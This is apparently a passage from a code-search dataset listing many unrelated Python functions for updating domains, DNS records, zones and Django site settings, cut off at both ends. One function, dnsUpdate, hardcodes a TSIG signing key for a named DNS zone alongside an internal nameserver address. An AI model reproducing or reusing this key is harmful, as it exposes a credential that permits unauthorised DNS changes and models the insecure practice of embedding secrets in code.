+ \":35357/v3/domains/\" + \\\n str(kwargs['domain_id'])\n _headers = {'x-auth-token': self.cloud_admin_info[\"token_domain\"],\n 'content-type': 'application/json'}\n\n _domain_info = {\"domain\": {}}\n for argument in [\"name\", \"description\", \"enabled\", \"disabled\"]:\n try:\n _domain_info['domain'].update(\n {argument: kwargs[argument]})\n except KeyError:\n pass\n _body = json.dumps(_domain_info)\n response = self.request(\"PATCH\", _url, _headers, _body)\n\n if response is None:\n LOG_OBJ.error(\"No response from Server while set the domain\")\n print (\"No response from Server while set the domain\")\n return response\n\n if response.status not in [200, 201, 202, 203, 204]:\n LOG_OBJ.error(\"Set domain Failed with status %s and error : %s\" %\n (response.status, response.data))\n print (\"Set domain Failed with status %s and error : %s\" %\n (response.status, response.data))\n return response.status\n return True", "def _adddomain(self, domain: Domain):\n\n domain = copy.deepcopy(domain)\n if self.model is not None:\n # Check that model and domain are compatible\n self._validate_model_domain(self.model, domain)\n\n # Add in domain\n self.domain = domain\n\n # Setup base namelists\n self._set_base_namelists()\n else:\n self.domain = domain", "def change_domain(self, new_domain):\n self.domain=new_domain\n for pm in self._maps.values():\n pm.change_domain(new_domain)", "def update_domain_name(self, DomainName: str, DomainNameConfigurations: List = None) -> Dict:\n pass", "def domain(self, domain):\n self._domain = domain", "def domain(self, domain):\n self._domain = domain", "def save_domain(self):\n del_domain = 0\n save_domain = 0\n\n sending_btn = self.dlg.sender().objectName()\n if sending_btn[:-1] == \"uBtnRemoveDomain\":\n del_domain = sending_btn[-1]\n if sending_btn[:-1] == \"uBtnSaveDomain\":\n save_domain = sending_btn[-1]\n\n keys = {}\n for entry in range(1, len(self.domains) + 2):\n if int(del_domain) == entry:\n continue\n domain = getattr(self.dlg, \"uTextDomain{0}\".format(entry)).text()\n key = getattr(self.dlg, \"uTextAPIKey{0}\".format(entry)).text().strip()\n if domain and key:\n keys[domain] = key\n self.api_key_instance.set_api_keys(keys)\n\n # remove store capability docs for the removed or add domain/key\n # if they already exits .i.e these will be reloaded\n if save_domain:\n ui_elem_num = save_domain\n else:\n ui_elem_num = del_domain\n\n domain = getattr(self.dlg, \"uTextDomain{0}\".format(ui_elem_num)).text()\n self.local_store.del_domains_xml(domain)\n\n # load / Reload service data\n self.load_settings()\n self.dlg.uWarningSettings.hide()\n self.dlg.uLabelWarning.hide()\n if self.curr_list_wid_index is not None:\n self.dlg.uListOptions.setCurrentItem(self.curr_list_wid_index)\n else:\n self.dlg.uListOptions.setCurrentRow(0)\n\n self.dlg.uStackedWidget.setCurrentIndex(0)\n self.services_loaded = False # key change, load data again\n self.load_ui()", "def domain(self, domain):", "def domain(self, domain):\n\n self._domain = domain", "def domain(self, domain):\n\n self._domain = domain", "def add(self, newaddress):\n list = newaddress.split(\"@\")\n newdomain = list[-1]\n if not newdomain in self.__domainlist:\n self.__domainlist.append(newdomain)\n else:\n print(\"Domain is already in the database\")", "def add_new_domain(self):\n\n domain = self.dlg.uComboBoxDomain.currentText()\n\n if domain in self.domains:\n self.dlg.uWarningSettings.show()\n self.dlg.uWarningSettings.setText(\n \"Warning: Domains must be unique. \" \"Please edit the domain below\"\n )\n return\n\n if len(self.domains) >= 10:\n self.dlg.uWarningSettings.show()\n self.dlg.uWarningSettings.setText(\n \"Warning: You can only store up to . \" \"10 domain entries\"\n )\n return\n\n if domain == \"OTHER\":\n domain = \"\"\n getattr(self.dlg, \"uTextDomain{0}\".format(len(self.domains) + 1)).setText(\n domain\n )\n getattr(self.dlg, \"uTextDomain{0}\".format(len(self.domains) + 1)).show()\n getattr(self.dlg, \"uTextAPIKey{0}\".format(len(self.domains) + 1)).show()\n getattr(self.dlg, \"uBtnRemoveDomain{0}\".format(len(self.domains) + 1)).show()\n getattr(self.dlg, \"uBtnSaveDomain{0}\".format(len(self.domains) + 1)).show()\n self.dlg.uWarningSettings.hide()", "def update(domain_name=None, primary_ns=None, admin_mail=None, refresh=None,\n retry=None, expire=None, default_ttl=None, patch=False, **kwargs):\n url = 'https://api.cloudns.net/dns/modify-soa.json'\n\n params = Parameters({\n 'domain-name': domain_name,\n 'primary-ns': primary_ns,\n 'admin-mail': admin_mail,\n 'refresh': {\n 'value': refresh,\n 'min_value': 1200,\n 'max_value': 43200,\n },\n 'retry': {\n 'value': retry,\n 'min_value': 180,\n 'max_value': 2419200,\n },\n 'expire': {\n 'value': expire,\n 'min_value': 1209600,\n 'max_value': 2419200,\n },\n 'default-ttl': {\n 'value': default_ttl,\n 'min_value': 60,\n 'max_value': 2419200,\n },\n })\n\n return requests.post(url, params=params.to_dict())", "def update_type_A_domain(self, domain, point_to):\n r53 = self.connections.get_route53()\n\n # Get Zone ID\n zone = r53.get_zone(self.env.domain)\n zone_id = zone.id\n\n if not zone.get_a(domain):\n sys.exit(\"\\nAbort: {} does not exists! \" \\\n \"Please create first!\".format(domain))\n\n # Commit change\n try:\n changes = ResourceRecordSets(connection=r53, hosted_zone_id=zone_id)\n change = changes.add_change(action='UPSERT', name=domain, type=\"A\")\n change.set_alias(\n alias_hosted_zone_id=zone_id,\n alias_dns_name=point_to,\n alias_evaluate_target_health=False)\n changes.commit()\n except DNSServerError:\n raise\n except Exception:\n print(\"Unexpected error: {}\".format(traceback.format_exc()))\n sys.exit(1)\n\n # Print record set\n record = zone.get_a(domain)\n print(\"\\nUpdated record set is:\\n{}\".format(record.to_print()))", "def update_instance_url(setting):\n site_obj = Site.objects.all().order_by('id').first()\n site_obj.domain = setting.value\n site_obj.save()", "def set_domain(domain):\n set_hosts(domain)\n click.echo(\n 'Host file was set: {} -> 127.0.0.1'.format(', '.join(domain))\n )", "def update_domain_endpoint_options(DomainName=None, DomainEndpointOptions=None):\n pass", "def test_update_domain_with_a_record(self):\n a_record = [{'type': 'A',\n 'name': 'ftp.example.com',\n 'data': '192.0.2.8',\n 'ttl': 3600}]\n self.test_update(updateRecords=a_record)", "def test_domain_changes_new_sitename_empty_domain_different(self):\n from django.contrib.sites.models import Site\n\n site_1 = Site.objects.create(name='Site 1', domain='site1.com')\n site_2 = Site.objects.create(name='Site 2', domain='site2.com')\n\n with self.settings(ALDRYN_SITES_DOMAINS={\n site_1.pk: {'name': '', 'domain': 'other-site1.com'},\n site_2.pk: {'name': None, 'domain': 'other-site2.com'},\n }):\n utils.set_site_names(force=True)\n\n s = Site.objects.get(id=site_1.pk)\n self.assertEquals(s.name, 'Site 1')\n self.assertEquals(s.domain, 'other-site1.com')\n\n s = Site.objects.get(id=site_2.pk)\n self.assertEquals(s.name, 'Site 2')\n self.assertEquals(s.domain, 'other-site2.com')", "def add_domain():\n\n today = date.today()\n\n if request.method == \"POST\":\n # Check to see if domain already exists because\n # duplicate domain names aren't allowed\n domain = session.query(Domain).filter_by(\n domain_name=request.form[\"domain-name\"]).first()\n if domain:\n message = \"{}Error!{} {}{}{} already exists.\".format(\n \"<strong>\", \"</strong>\", \"<em>\", domain.domain_name, \"</em>\")\n flash(message, \"danger\")\n return redirect(url_for(\"add_domain\", today=today,\n category_names=category_names))\n\n # Find existing Provider otherwise create new Provider object\n provider = session.query(Provider).filter(\n Provider.provider_url == request.form[\"provider-url\"]).first()\n if not provider:\n provider = Provider(provider_url=request.form[\"provider-url\"])\n\n # Get existing category name object from CategoryName table\n category_name = session.query(CategoryName).filter(\n CategoryName.name == request.form[\"category\"]).first()\n\n domain = Domain(\n category=Category(),\n domain_name=request.form[\"domain-name\"],\n ip=request.form[\"ip-address\"],\n provider=provider)\n domain.category.category_name = category_name\n domain.status.append(Status(status_type=\"added\"))\n domain.is_active = request.form.get(\"is-active\", False)\n domain.is_monitored = request.form.get(\"is-monitored\", False)\n\n # Convert date string from form to date object\n exp_date = datetime.strptime(request.form.get(\"exp-date\"),\n \"%Y-%m-%d\").date()\n domain.exp_date = exp_date\n\n session.add(domain)\n\n try:\n session.commit()\n message = \"{}Success!{} Added {}{}{} successfully.\".format(\n \"<strong>\", \"</strong>\", \"<em>\", domain.domain_name, \"</em>\")\n flash(message , \"success\")\n except:\n session.rollback()\n message = \"{}Error!{} Could not add add {}{}{}.\".format(\n \"<strong>\", \"</strong>\", \"<em>\", domain.domain_name, \"</em>\")\n flash(message, \"danger\")\n\n if request.form[\"submit\"] == \"Submit\":\n return redirect(url_for(\"home\"))\n else:\n return redirect(url_for(\"add_domain\", today=today,\n category_names=category_names))\n else:\n return render_template(\"add_domain.html\", today=today,\n category_names=category_names)", "def test_domain_changes_new_sitename_empty_domain_matches(self):\n from django.contrib.sites.models import Site\n\n site_1 = Site.objects.create(name='site1.com', domain='site1.com')\n site_2 = Site.objects.create(name='site2.com', domain='site2.com')\n\n with self.settings(ALDRYN_SITES_DOMAINS={\n site_1.pk: {'name': '', 'domain': 'other-site1.com'},\n site_2.pk: {'name': None, 'domain': 'other-site2.com'},\n }):\n utils.set_site_names(force=True)\n\n s = Site.objects.get(id=site_1.pk)\n self.assertEquals(s.name, 'other-site1.com')\n self.assertEquals(s.domain, 'other-site1.com')\n\n s = Site.objects.get(id=site_2.pk)\n self.assertEquals(s.name, 'other-site2.com')\n self.assertEquals(s.domain, 'other-site2.com')", "def updateSites(self):\n updated_entry = self.client.Update(self.entry)\n return updated_entry", "def change_user_domain(self, user_domain, domain_format='name'):\n self.creds['user_domain_%s' % domain_format] = user_domain", "def domain(self, value):\n if hasattr(self, \"_domain\"):\n raise ValueError(\"A ServerName's domain cannot be changed.\")\n if value is None:\n raise ValueError(\"A ServerName must be given a domain.\")\n if not isinstance(value, str):\n raise TypeError(\"The domain must be a string, not %s.\" % (type(value)))\n if value is \"\":\n raise ValueError(\"A empty string is not a valid domain.\")\n self._domain = value", "def domain_id(self, domain_id):\n\n self._domain_id = domain_id", "def test_domain_unchanged_new_sitename_empty_domain_different(self):\n from django.contrib.sites.models import Site\n\n site_1 = Site.objects.create(name='Site 1', domain='site1.com')\n site_2 = Site.objects.create(name='Site 2', domain='site2.com')\n\n with self.settings(ALDRYN_SITES_DOMAINS={\n site_1.pk: {'name': '', 'domain': 'site1.com'},\n site_2.pk: {'name': None, 'domain': 'site2.com'},\n }):\n utils.set_site_names(force=True)\n\n s = Site.objects.get(id=site_1.pk)\n self.assertEquals(s.name, 'Site 1')\n self.assertEquals(s.domain, 'site1.com')\n\n s = Site.objects.get(id=site_2.pk)\n self.assertEquals(s.name, 'Site 2')\n self.assertEquals(s.domain, 'site2.com')", "def _update_domainmetadata(self, domain_id, kind, values=None,\n delete=True):\n # Fetch all current metadata of the specified kind\n values = values or []\n\n query = self.session.query(models.DomainMetadata)\n query = query.filter_by(domain_id=domain_id, kind=kind)\n\n metadatas = query.all()\n\n for metadata in metadatas:\n if metadata.content not in values:\n if delete:\n LOG.debug('Deleting stale domain metadata: %r' %\n tuple([domain_id, kind, metadata.value]))\n # Delete no longer necessary values\n metadata.delete(self.session)\n else:\n # Remove pre-existing values from the list of values to insert\n values.remove(metadata.content)\n\n # Insert new values\n for value in values:\n LOG.debug('Inserting new domain metadata: %r' %\n tuple([domain_id, kind, value]))\n m = models.DomainMetadata(domain_id=domain_id, kind=kind,\n content=value)\n m.save(self.session)", "def test_put(populate_hostnames, authenticated_client):\n rv = authenticated_client.get(\n '/api/observables/{0:d}/'.format(populate_hostnames[0].id))\n observable_json = json.loads(rv.data)\n rv = authenticated_client.put(\n '/api/observables/{0:d}/'.format(observable_json['id']),\n data=json.dumps({'value': 'qwe'}),\n content_type='application/json')\n assert rv.status_code == 400\n response = json.loads(rv.data)\n assert 'ValidationError' in response\n assert 'not a valid string for domain-name' in response['ValidationError']", "def delete_domain(DomainName=None):\n pass", "def pre_domain_update(self, resource_id, resource_dict):\n pass", "def dnsUpdate(portId, ipAddr='', action='create'):\n\tzone = 'osdev.skrill.net.'\n\trevZone = '23.32.10.in-addr.arpa'\n\tcname = portId + '.' + zone\n\tttl = 300\n\tnsServer = '10.32.29.99'\n key = 'yw0ADuZjXAhcGgMOYg/Clx1128iUSfhlOHdsY4CzVNIVVVXismrAe+WKMBxocLhbrIVHGvmR94jDC46K18K6oQ=='\n keyRing = dns.tsigkeyring.from_text({zone : key})\n\thostName = genHostname(ipAddr)\n\tdnsUpdate = dns.update.Update(zone, keyring=keyRing)\n\tipAddr = str(ipAddr)\n\thostName = str(hostName)\n\tif action == 'create':\n\t\tdnsUpdate.replace( hostName.split('.')[0], ttl, 'A', ipAddr )\n\t\tdnsResponse = dns.query.tcp(dnsUpdate, nsServer )\n\t\tlogging.info('DNS A record updated for: ' + hostName)\n\t\tdnsUpdate.replace(portId, ttl, 'CNAME', hostName)\n\t\tdnsResponse = dns.query.tcp(dnsUpdate, nsServer )\n\t\tlogging.info('DNS CNAME record updated for: ' + hostName)\n\t\tdnsUpdate = dns.update.Update(revZone, keyring=keyRing)\n\t\tdnsUpdate.replace(ipAddr.split('.')[3], ttl, 'PTR', hostName)\n\t\tdnsResponse = dns.query.tcp(dnsUpdate, nsServer )\n\t\tlogging.info('DNS PTR record updated for: ' + hostName)\n\tif action == 'delete':\n\t\ttry:\n\t\t\thostName = dns.resolver.query(cname, 'CNAME')[0].to_text()\n\t\t\tipAddr = dns.resolver.query(hostName, 'A')[0].to_text()\n\t\texcept Exception, e:\n\t\t\tlogging.exception('DNS query failed for cname and A records: ' + cname + ' ' + hostName)\n\t\t\thostName = ''\n\t\t\treturn hostName\n\t\tdnsUpdate.delete(cname, 'CNAME')\n\t\tdnsResponse = dns.query.tcp(dnsUpdate, nsServer )\n\t\tlogging.info('DNS CNAME record deleted for: ' + portId + ' to ' + hostName)\n\t\tdnsUpdate.delete(hostName.split('.')[0])\n\t\tdnsResponse = dns.query.tcp(dnsUpdate, nsServer )\n\t\tlogging.info('DNS A record deleted for: ' + hostName)\n\t\tdnsUpdate = dns.update.Update(revZone, keyring=keyRing)\n dnsUpdate.delete(ipAddr.split('.')[3])\n\t\tdnsResponse = dns.query.tcp(dnsUpdate, nsServer )\n\t\tlogging.info('DNS PTR record deleted for: ' + hostName)\n\t\treturn hostName", "def set_domain(self, var, domain) :\n if var not in self.variables :\n raise KeyError(str(var) + \" is not a variable in this problem.\")\n self.domains[var] = sorted(domain[:])\n return self", "def _update_site_configuration(self):\n self.site.configuration.site_values = {'THIRD_PARTY_AUTH_ONLY_DOMAIN': self.email_domain_name}\n self.site.configuration.save()", "def ip_update(self, custom_domain, heroku_host):\n update_pattern = None\n resultmsg = \"TargetHost:%s Result:\" % custom_domain\n new_dns_a_record = None\n\n dns_a_record = self.get_dns_A_record(custom_domain)\n heroku_host_ip = self.get_heroku_host_ip(heroku_host)\n\n #Store A record to Dozens Server\n if dns_a_record is None:\n update_pattern = \"Create\"\n new_dns_a_record = self.create_A_record(heroku_host_ip,\n custom_domain, Config.DEFAULT_TTL)\n elif dns_a_record[\"content\"] != heroku_host_ip:\n update_pattern = \"Update\"\n new_dns_a_record = self.update_A_record(heroku_host_ip,\n dns_a_record)\n elif dns_a_record[\"content\"] == heroku_host_ip:\n update_pattern = \"Already updated\"\n new_dns_a_record = dns_a_record\n\n #Evaluate and cache the result\n if new_dns_a_record is not None:\n resultmsg += \"Success.%s%s\" % (update_pattern, new_dns_a_record)\n resultflg = True\n if update_pattern != \"Alread updated\":\n self._set_cache(custom_domain, new_dns_a_record)\n else:\n resultmsg += \"Fail. %s.\" % update_pattern\n resultflg = False\n\n return (resultflg, resultmsg)", "def update_record(self, record, name=None, type=None, data=None, extra=None):\n params = {\"type\": record.type, \"name\": record.name, \"data\": data}\n if data is None:\n params[\"data\"] = record.data\n if extra:\n try:\n params[\"priority\"] = extra[\"priority\"]\n except KeyError:\n params[\"priority\"] = None\n try:\n params[\"port\"] = extra[\"port\"]\n except KeyError:\n params[\"port\"] = None\n try:\n params[\"weight\"] = extra[\"weight\"]\n except KeyError:\n params[\"weight\"] = None\n\n if \"ttl\" in extra:\n params[\"ttl\"] = extra[\"ttl\"]\n\n res = self.connection.request(\n \"/v2/domains/{}/records/{}\".format(record.zone.id, record.id),\n data=json.dumps(params),\n method=\"PUT\",\n )\n\n return Record(\n id=res.object[\"domain_record\"][\"id\"],\n name=res.object[\"domain_record\"][\"name\"],\n type=record.type,\n data=data,\n zone=record.zone,\n ttl=res.object[\"domain_record\"].get(\"ttl\", None),\n driver=self,\n extra=extra,\n )", "def test_domain_unchanged_new_sitename_empty_domain_matches(self):\n from django.contrib.sites.models import Site\n\n site_1 = Site.objects.create(name='site1.com', domain='site1.com')\n site_2 = Site.objects.create(name='site2.com', domain='site2.com')\n\n with self.settings(ALDRYN_SITES_DOMAINS={\n site_1.pk: {'name': '', 'domain': 'site1.com'},\n site_2.pk: {'name': None, 'domain': 'site2.com'},\n }):\n utils.set_site_names(force=True)\n\n s = Site.objects.get(id=site_1.pk)\n self.assertEquals(s.name, 'site1.com')\n self.assertEquals(s.domain, 'site1.com')\n\n s = Site.objects.get(id=site_2.pk)\n self.assertEquals(s.name, 'site2.com')\n self.assertEquals(s.domain, 'site2.com')", "def domainRouterSet(self, domain, body):\n pass", "def on_the_active_directory_page_input_the_domain_name_ad_domain(driver, ad_domain):\n global domain\n domain = ad_domain\n assert wait_on_element(driver, 5, '//h3[@class=\"formtitle\" and text()=\"Active Directory\"]')\n assert wait_on_element(driver, 7, '//input[@ix-auto=\"input__Domain Name\"]', 'inputable')\n driver.find_element_by_xpath('//input[@ix-auto=\"input__Domain Name\"]').clear()\n driver.find_element_by_xpath('//input[@ix-auto=\"input__Domain Name\"]').send_keys(ad_domain)", "async def setjrremove(self, ctx, domain):\n allowedDomains = await self.config.guild(ctx.guild).allowedDomains()\n \n try:\n allowedDomains.remove(domain)\n except:\n await ctx.send(\"Something went wrong :( Check if you have the name right using `[p]setjsonrequest list`\")\n else:\n await self.config.guild(ctx.guild).allowedDomains.set(allowedDomains)\n await ctx.message.add_reaction(\"✅\")", "def save(\n server_context: ServerContext,\n schema_name: str,\n query_name: str,\n domain: Domain,\n container_path: str = None,\n options: Dict = None,\n) -> any:\n url = server_context.build_url(\"property\", \"saveDomain.api\", container_path=container_path)\n payload = {\n \"domainDesign\": domain.to_json(),\n \"queryName\": query_name,\n \"schemaName\": schema_name,\n }\n\n if options is not None:\n payload[\"options\"] = options\n\n return server_context.make_request(url, json=payload)", "def update_zone(self, zone, domain, type=\"master\", ttl=None, extra=None, ex_raw=False):\n if extra is not None:\n not_specified = [key for key in zone.extra.keys() if key not in extra.keys()]\n else:\n not_specified = zone.extra.keys()\n\n if ttl is None:\n ttl = zone.ttl\n\n params = {\"DOMAIN\": domain, \"TTL\": ttl}\n\n for key in not_specified:\n params[key] = zone.extra[key]\n if extra is not None:\n params.update(extra)\n if ex_raw:\n action = \"/api_dns_modify_raw.asp\"\n if self.reseller_id is not None:\n action = \"/api_dns_modify_raw_reseller.asp\"\n method = \"POST\"\n else:\n action = \"/api_dns_modify.asp\"\n if self.reseller_id is not None:\n action = \"/api_dns_modify_reseller.asp\"\n method = \"GET\"\n response = self.connection.request(action, params=params, method=method) # noqa\n zone = self.get_zone(zone.id)\n return zone", "def _update_domains_on_server_update(self, server):\n ns_rec_content = self._sanitize_content(\"NS\", server['name'])\n\n LOG.debug(\"Content field of existing NS records will be updated\"\n \" to the following upon server update: %s\" % ns_rec_content)\n try:\n\n # Execute the manually prepared query\n # A TX is required for, at the least, SQLite.\n #\n self.session.begin()\n\n # first determine the old name of the server\n # before making the updates. Since the value\n # is coming from an NS record, the server name\n # will not have a trailing period (.)\n old_ns_rec = self.session.query(models.Record)\\\n .filter_by(type='NS', designate_id=server['id'])\\\n .first()\n if old_ns_rec is not None:\n old_server_name = old_ns_rec.content\n\n LOG.debug(\"old server name read from a backend NS record:\"\n \" %s\" % old_server_name)\n LOG.debug(\"new server name: %s\" % server['name'])\n\n # Then update all NS records that need updating\n # Only the name of a server has changed when we are here\n self.session.query(models.Record)\\\n .filter_by(type='NS', designate_id=server['id'])\\\n .update({\"content\": ns_rec_content})\n\n # Then update all SOA records as necessary\n # Do the SOA last, ensuring we don't trigger a NOTIFY\n # before the NS records are in place.\n #\n # Update the content field of every SOA record that has the\n # old server name as part of its 'content' field to reflect\n # the new server name.\n # Need to strip the trailing period from the server['name']\n # before using it to replace the old_server_name in the SOA\n # record since the SOA record already has a trailing period\n # and we want to keep it\n self.session.execute(models.Record.__table__\n .update()\n .where(and_(models.Record.__table__.c.type == \"SOA\",\n models.Record.__table__.c.content.like\n (\"%s%%\" % old_server_name)))\n .values(content=func.replace(\n models.Record.__table__.c.content,\n old_server_name,\n server['name'].rstrip('.'))\n )\n )\n\n except Exception:\n with excutils.save_and_reraise_exception():\n self.session.rollback()\n # now commit\n else:\n self.session.commit()", "async def setjradd(self, ctx, domain):\n allowedDomains = await self.config.guild(ctx.guild).allowedDomains()\n allowedDomains.append(domain)\n await self.config.guild(ctx.guild).allowedDomains.set(allowedDomains)\n await ctx.message.add_reaction(\"✅\")", "def set_domain_sid(self, sid):\n dsdb._samdb_set_domain_sid(self, sid)", "def update(self, host_id, values):\n if not values:\n return _('No values to update passed.')\n return self._update('/os-hosts/%s' % host_id, values,\n response_key='host')", "def update_dns(self):\n if self.ptr:\n which_zone = None\n zones = dns.models.Zone.objects.all()\n for zone in zones:\n if self.ptr.endswith(zone.name) or self.ptr.endswith(zone.name + '.'):\n which_zone = zone\n break\n\n if which_zone:\n zone_name = which_zone.name\n record_name = self.ptr[:-len(zone_name)] if not self.ptr.endswith('.') else self.ptr[:-len(zone_name) - 1]\n if record_name.endswith('.'):\n record_name = record_name[:-1]\n record_type = 'A' if self.family == 4 else 'AAAA'\n\n dns.models.Record.objects.get_or_create(\n name=record_name,\n record_type=record_type,\n zone=which_zone,\n address=self\n )", "def populate_domain_data(self, domain):\n self.domain_resolve(domain)\n domain_data = server.get_domain_data(domain)['data']['userdata']\n\n self.domain_data[domain] = self.domain_resolve(domain)\n\n if domain in self.domain_data.keys():\n try:\n self.domain_data[domain]['documentroot'] = domain_data['documentroot']\n self.domain_data[domain]['ip'] = domain_data['ip']\n except KeyError:\n self.domain_data[domain]['documentroot'] = \"No domain data found, admin should check\"\n self.domain_data[domain]['ip'] = \"No domain data found, admin should check\"", "def fusion_api_edit_directory(self, body, uri, api=None, headers=None):\n return self.logindomain.update(body, uri, api, headers)", "def ModifyGroupDomainConfig(self, request):\n try:\n params = request._serialize()\n headers = request.headers\n body = self.call(\"ModifyGroupDomainConfig\", params, headers=headers)\n response = json.loads(body)\n model = models.ModifyGroupDomainConfigResponse()\n model._deserialize(response[\"Response\"])\n return model\n except Exception as e:\n if isinstance(e, TencentCloudSDKException):\n raise\n else:\n raise TencentCloudSDKException(type(e).__name__, str(e))", "def put(id_=None):\n\n logger.debug('Catch PUT request by URL /api/departments/%i.', id_)\n try:\n args = department_args.parse_args()\n ds.update(id_, name=args['name'], email=args['email'])\n except Exception:\n return {'message': \"Can't update department.\"}, 404\n return marshal_departments(ds.get(id_)), 200", "def update(self, organisation: Organisation) -> None:\n ...", "def ad_domain_info(self, ad_domain_info):\n self._ad_domain_info = ad_domain_info", "def update_record(self, context, record):\n record = self.dns_manager.update_record(context, record)\n return record", "def return_domain_updated(hostname, domain_name, value1, value2, value3, username):\n #Established the connection\n myconnection = ssh_connection(hostname, username)\n if myconnection == 1:\n return \"Connection to %s failed\" % hostname\n else:\n if domain_name == \"default\":\n #We will to test if the domain already exist in the postfix configuration\n commandline=\"sudo /usr/sbin/postconf -P */unix/syslog_name | cut -d '/' -f 1 | grep default_destination \"\n stdin, stdout, stderr = myconnection.exec_command(commandline)\n if stdout.read():\n #The domain does not exist, exit\n return \"This domain already exist\"\n else:\n list = []\n #Command to send to the host\n commandline=\"sudo /usr/sbin/postconf -e default_destination_concurrency_limit=%d\" % value1\n #We added the commanline(s) to a list.\n #Paramiko can only send one command at a time\n list.append(commandline)\n #Next command\n commandline=\"sudo /usr/sbin/postconf -e default_destination_recipient_limit=%d\" % value2\n list.append(commandline)\n commandline=\"sudo /usr/sbin/postconf -e default_destination_rate_delay=%ds\" % value3\n list.append(commandline)\n\n #We send the commands\n for i in list:\n stdin, stdout, stderr = myconnection.exec_command(i)\n #if error\n if stderr.read():\n is_added=False\n else:\n is_added=True\n\n if is_added == True:\n #Reload conf postfix\n stdin, stdout, stderr = myconnection.exec_command(\"sudo /etc/init.d/postfix reload\")\n if stderr.read():\n return \"The domain has not been updated. Failed. The server postfix has not restarted. Please contact system administrator \"\n else:\n return \"The domain %s has been updated\" % domain_name\n else:\n return \"The domain has not been updated. Failed, please contact system administrator \"\n\n else:\n #We will to test if the domain already exist in the postfix configuration\n commandline=\"sudo /usr/sbin/postconf -P */unix/syslog_name | cut -d '/' -f 1 | grep %s \" % domain_name\n stdin, stdout, stderr = myconnection.exec_command(commandline)\n if not stdout.read():\n #The domain does not exist, exit\n return \"This domain does not exist, you can't update it\"\n else:\n list = []\n #Command to send to the host\n commandline=\"sudo /usr/sbin/postconf -e %s_destination_concurrency_limit=%s\" % (domain_name, value1)\n #We added the commanline(s) to a list.\n #Paramiko can only send one command at a time\n list.append(commandline)\n #Next command\n commandline=\"sudo /usr/sbin/postconf -e %s_destination_recipient_limit=%s\" % (domain_name, value2)\n list.append(commandline)\n commandline=\"sudo /usr/sbin/postconf -e %s_destination_rate_delay=%ss\" % (domain_name, value3)\n list.append(commandline)\n\n #We send the commands\n for i in list:\n stdin, stdout, stderr = myconnection.exec_command(i)\n #if error\n if stderr.read():\n is_added=False\n else:\n is_added=True\n\n if is_added == True:\n #Reload conf postfix\n stdin, stdout, stderr = myconnection.exec_command(\"sudo /etc/init.d/postfix reload\")\n if stderr.read():\n return \"The domain has not been updated. Failed. The server postfix has not restarted. Please contact system administrator \"\n else:\n return \"The domain %s has been updated\" % domain_name\n else:\n return \"The domain has not been updated. Failed, please contact system administrator \"\n\n # Disconnect from the host\n myconnection.close()", "def fusion_api_edit_login_domains_global_settings(self, body, param='', api=None, headers=None):\n return self.domain_settings.put(body, param, api, headers)", "def update(self, host, values):\n body = dict(host=values)\n return self._update(\"/os-hosts/%s\" % host, body, response_key='host')", "def store_domain(self, store_domain):\n self._store_domain = store_domain\n return self", "def update_soa(record):\n if record and record.domain and record.domain.soa:\n record.domain.soa.serial += 1\n record.domain.soa.dirty = True\n record.domain.soa.save()", "def _update_entry(self, section, key, value):\n entries = section[key] if key in section else []\n if type(entries) != list:\n entries = [entries]\n if len(entries) < self.dom_id - 2:\n raise ValueError('Cannot set namelist value for domain %d, previous domains not filled out.' % self.dom_id)\n if len(entries) <= self.dom_id - 1:\n entries.append(value)\n else:\n entries[self.dom_id-1] = value\n section[key] = entries", "def create_domain(self, domain: str) -> Session:\n uri = f\"{self.uri}/domains\"\n data = {\n \"hostname\": domain\n }\n response = self.request(uri=uri, method=\"POST\", data=data)\n\n return response", "def test_updatednsrecord(kasserver, kasapi):\n kasserver.add_dns_record(\"test.example.com\", \"CNAME\", \"www.example2.com\")\n assert kasapi.requests_contains(\"update_dns_settings\")", "def update_dns(c, stack_name, domain_name, profile, create=False):\n action = 'create' if create else 'update'\n\n with chdir(WORKING_DIR):\n aws('cloudformation', f'{action}-stack',\n '--stack-name', f'{stack_name}-dns',\n '--template-body', f'file://zone.yaml',\n '--parameters',\n f'ParameterKey=DomainName,ParameterValue={domain_name}',\n f'--profile', f'{profile}')\n\n aws('cloudformation', 'wait',\n f'stack-{action}-complete',\n '--stack-name', f'{stack_name}-dns',\n f'--profile', f'{profile}')\n\n with chdir(WORKING_DIR):\n aws('cloudformation', f'{action}-stack',\n '--stack-name', f'{stack_name}-dns-mail',\n '--template-body', f'file://mail.yaml',\n f'--profile', f'{profile}')", "def domain(self, domain):\n # type: (string_types) -> None\n\n if domain is not None:\n if not isinstance(domain, string_types):\n raise TypeError(\"Invalid type for `domain`, type has to be `string_types`\")\n\n self._domain = domain", "def save(subdomain):\n\tglobal Counter\n\tif db.session.query(Target.id).filter_by(subdomain=subdomain).scalar() is None :\n\t\tdb.session.add(Target(subdomain,str(uuid.uuid4())))\n\t\tdb.session.commit()\n\t\tCounter += 1\n\t\tlogger.log('INFO',f'[+] {subdomain} added to database')\n\telse:\n\t\tlogger.log('ERROR',f'[-] {subdomain} already exists')", "def update(self, _id=None, dynurl_config_data=None):\n data = DataObject()\n data.add_value(\"dynurl_config_data\", dynurl_config_data)\n endpoint = URL_MAPPING + \"/{}\".format(_id)\n response = self.client.put_json(endpoint, data.data)\n response.success = response.status_code == 204\n return response", "def update_attributes_by_domains(etl, update_kwargs):\r\n import arcetl\r\n func = functools.partial(\r\n etl.transform, transformation=arcetl.attributes.update_by_domain_code,\r\n )\r\n tuple(func(**kwargs) for kwargs in update_kwargs)", "def update_dns(self):\n\t\tfor url in self.update_urls:\n\n\t\t\t# Adds protocol if address does not contain it\n\t\t\tif 'http://' not in url: url = 'http://' + url\n\n\t\t\trequest = urllib.urlopen(url)\n\t\t\trequest.close()", "def do_update(self, line):\n\t\tif not(self.db is None):\n\t\t\ttry:\n\t\t\t\tfield = input(\"Field to update: \")\n\t\t\t\tvalue = input(\"Value: \")\n\t\t\t\tquery = {'_id': ObjectId(line)}\n\t\t\t\tnew_vals = {\"$set\": {field: value}}\n\t\t\t\tself.db.contact.update_one(query, new_vals)\n\t\t\texcept Exception:\n\t\t\t\tprint(\"Wrong _id! Try again.\")", "def test_update(self, updateRecords=None):\n fake_dns_instance = FakeDnsInstance()\n t = template_format.parse(domain_only_template)\n instance = self._setup_test_cloud_dns_instance('dnsinstance_update', t)\n instance.resource_id = 4\n update_args = self.update_domain_only_args\n self._stubout_update(\n instance,\n fake_dns_instance,\n updateRecords,\n **update_args)\n\n uprops = dict(instance.properties)\n uprops.update({\n 'emailAddress': '[email protected]',\n 'ttl': 5555,\n 'comment': 'updated comment',\n })\n if updateRecords:\n uprops['records'] = 